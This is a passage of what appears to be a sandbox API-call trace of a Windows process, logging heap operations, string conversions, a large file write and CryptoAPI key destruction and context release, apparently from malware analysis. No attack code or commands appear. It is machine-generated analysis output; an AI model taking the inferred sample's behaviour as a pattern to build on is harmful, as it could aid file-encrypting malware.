lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.070] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.072] WriteFile (in: hFile=0x258, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0x11fd0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144f194*=0x11fd0, lpOverlapped=0x0) returned 1 [0077.075] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0077.075] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.075] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0077.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0077.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca6a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0077.076] CryptDestroyKey (hKey=0x41ac140) returned 1 [0077.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0077.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0077.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0077.076] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.076] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.078] TranslateMessage (lpMsg=0x144eb0c) returned 0 [0077.078] DispatchMessageW (lpMsg=0x144eb0c) returned 0x0 [0077.078] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0077.078] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0077.078] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0077.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0077.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.079] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0077.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0077.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0077.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.079] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0077.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0077.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0077.079] PeekMessageW (in: lpMsg=0x144e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e944) returned 0 [0077.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0077.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0077.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0077.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0077.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0077.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0077.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0077.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0077.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0077.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0077.080] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0077.080] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.080] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0077.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.080] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0077.081] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.081] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0077.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.082] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.082] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0077.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0077.083] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0077.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0077.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0077.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.085] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.085] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.086] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.086] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 